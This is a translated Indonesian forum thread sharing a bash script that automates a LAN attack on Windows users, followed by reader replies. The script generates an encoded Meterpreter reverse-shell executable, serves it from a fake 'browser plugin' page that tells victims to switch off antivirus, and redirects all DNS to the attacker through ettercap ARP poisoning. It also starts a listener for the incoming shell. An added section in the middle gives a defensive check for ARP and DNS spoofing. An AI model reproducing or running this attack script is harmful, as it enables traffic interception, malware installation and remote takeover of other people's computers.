Script Auto Exploit [Ettercap+Dnsspoofing] Method
#1
Assalamualaikum, brothers and sisters... ??
I'm back again making a new thread; I've dug around here and there and haven't seen this one yet (if it's a repost, just delete it).
I've kept this script for a very long time but never got around to sharing it (understandable, I didn't know how to make a thread yet).
Now is a good opportunity to share this script, a "bash" script whose function is to exploit Windows using the "ettercap + dnsspoofing" technique (maybe it already exists done manually).

I named this script dabllink.sh, because its author is dabllink. That's why I gave it that name. :D
OK, next is the code:

code:

Code:
#!/bin/bash

#Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )

#Created By Dabllink

#save this file @ root

#Thanks to :

#p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew....

#special thanks to : brother Blusp10it & Red-Dragon..

clear

apt-get install figlet

clear

echo "================================================="

figlet Dabllink

echo "================================================="

echo

echo -en "input ip anda : "

read ip

echo

echo -en "input port anda: "

read port

echo

echo "Tunggu , sedang proses (backdooring)....."
msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe
clear
panggilmsfcli() {
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E
}


gnome() {

echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
gnome-terminal --command="./spoof.sh"
echo "exploit............................................ "
panggilmsfcli
}

kde() {
echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
konsole --noclose -e ./spoof.sh
echo "exploit............................................ "
panggilmsfcli

}

clear
/etc/init.d/apache2 start
clear

rm /var/www/index.html
echo '<html>
<head>
<title>Browser Plugins !!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian! </u></b>install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan <b>seperti antivirus</b></p>
<p align="center">
<input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html
echo "('/nc11gs.exe','download');" >> /var/www/index.html
echo 'return false;"></p>
</body>
</html>' >> /var/www/index.html
clear
cetak() {
echo "1. /usr/local/share/ettercap/etter.dns"
echo
echo "2. /usr/share/ettercap/etter.dns "
echo
echo -en "Masukan tempat etter.dns anda berada (1/2): "
read pilihan
if [ $pilihan == "1" ]; then
echo "* A $ip" > /usr/local/share/ettercap/etter.dns  
elif [ $pilihan == "2" ]; then
echo "* A $ip" > /usr/share/ettercap/etter.dns
else
clear
cetak
fi
}
cetak
clear


echo -en "Anda menggunakan kde/gnome? "
read pilihanzz
$pilihanzz

#M02X TeaM ..

Save it in root (save & "simpen", what's the difference) with the file name dabllink.sh (another name is fine too), but don't change the author. Otherwise dabllink will get mad, hehehehe...
Continuing the explanation: "why does it have to be saved in "root"??"
Well, because the DNS spoofing part is saved at "/root/spoof.sh". It can also be saved in any directory; what matters is that spoof.sh is saved in the matching directory.

Example:
I saved "dabllink.sh" in the directory "/pentest/framework/", so naturally I edited the spoof.sh path to "/pentest/framework/spoof.sh".

OK, happy trying, :)
If you have VirtualBox, try it there; if not, just use a real network, hehehe.

next, a.k.a. moving on :D
Eh, looks like our discussion is already over. OK then, friends. I'm ready to receive the "green ones", hehehehe...


Thanks to dabllink (even though I don't know the person).



Quote:~ Tan Hana Wighna Tan Sirna ~
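
Added example, not part of the original post or of the script: the script's `-M arp` poisoning and its `* A $ip` line in etter.dns each leave a trace on an affected host, and the two checks below look for them. The function names, the input formats (`ip neigh`-style lines, and "name address" pairs from resolver logs) and the sample data are assumptions constructed for illustration.

```bash
#!/bin/bash
# Added defensive example; function names and sample data are constructed.

# dup_macs: read `ip neigh`-style lines on stdin and print every MAC that is
# claimed by more than one IP. ARP poisoning leaves the gateway and the
# poisoning host sharing one MAC in the victim's neighbour table.
dup_macs() {
  awk '{ for (i = 1; i < NF; i++) if ($i == "lladdr") {
           mac = tolower($(i + 1))
           if (!seen[mac, $1]++) { n[mac]++; ips[mac] = ips[mac] " " $1 }
         } }
       END { for (m in n) if (n[m] > 1) print m ":" ips[m] }' | sort
}

# wildcard_answers: read "name address" pairs (one resolved A record per
# line) on stdin and print each private (RFC 1918) address returned for at
# least $1 distinct names (default 3). A "* A <ip>" entry in etter.dns makes
# unrelated names all resolve to the same LAN host.
wildcard_answers() {
  awk -v min="${1:-3}" '
    $2 ~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ {
      if (!seen[$2, $1]++) n[$2]++
    }
    END { for (a in n) if (n[a] >= min) print a, n[a] }' | sort
}

# Constructed sample: neighbour table of a host whose gateway entry has been
# overwritten with the MAC of 192.168.1.50.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 08:00:27:AA:BB:CC STALE
192.168.1.20 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE'

# Constructed sample: resolver answers seen by the same host.
SAMPLE_DNS='www.example.com 192.168.1.50
mail.example.org 192.168.1.50
update.example.net 192.168.1.50
intranet.example.lan 192.168.1.10
www.example.com 192.168.1.50'

echo "Shared MACs:"
printf '%s\n' "$SAMPLE_NEIGH" | dup_macs
echo "Private addresses answering for many names:"
printf '%s\n' "$SAMPLE_DNS" | wildcard_answers
```

On a live host the first function can be fed from `ip neigh show`; a gateway IP appearing in its output is the signal to investigate.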

#2
Awesome, bro.. if possible, just attach the script :) in case there are errors, just a suggestion :)
~:: We Are Region Aceh ::~
#Indonesian Backtrack Team Regional Aceh#

#3
Wow, awesome bash \m/ \m/
I agree with bro shift-del \m/ \m/
alpoah@IBTeam:~#


Power Off STUPID

#4
(12-11-2012, 11:17 AM)alpoah Wrote: Wow, awesome bash \m/ \m/
I agree with bro shift-del \m/ \m/

Try copy-pasting it, bro... does the script work..??
:D , hehehhehehehehe.......
Quote:~ Tan Hana Wighna Tan Sirna ~

#5
Wow.. I presented this topic at Linux Camp 2 the other day... Hhiikss ettercap and dnsspoof really are good..
=========Cyberly================

Indonesian Backtrack Team Regional Aceh

"Even when silent, keep learning"

GPComp

#6
(10-31-2012, 10:56 PM)gnome_selpa Wrote: Assalamualaikum, brothers and sisters... ??

Nice one, bro :) :-bd
Sorry, I put my comment in the wrong place earlier =))
Information Is The Most Dangerous Weapon In The World

#7
Thanks bro for sharing it here, +1 from me

btw this auto script works similarly to the one in SET

#8
(03-24-2013, 06:29 AM)iKONspirasi Wrote: Thanks bro for sharing it here, +1 from me

btw this auto script works similarly to the one in SET

Yep, that's right bro, it's just similar but different :D huakakakakakaka :P
btw thanks for the cendol sagu, bro :-bd
Quote:~ Tan Hana Wighna Tan Sirna ~

#9
Thanks bro, using this script saves more time when you want to exploit Windows :=))
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#10
Bro zee once made a tool like this :D just search for egharts

btw why does it error? I copy-pasted it from the TS above, bro

xsan-lahci@bt:~# ./dablink.sh
./dablink.sh: line 4: syntax error near unexpected token `('
./dablink.sh: line 4: `Bypass Firewall ( Easy metasploit + dns spoofing etc )'





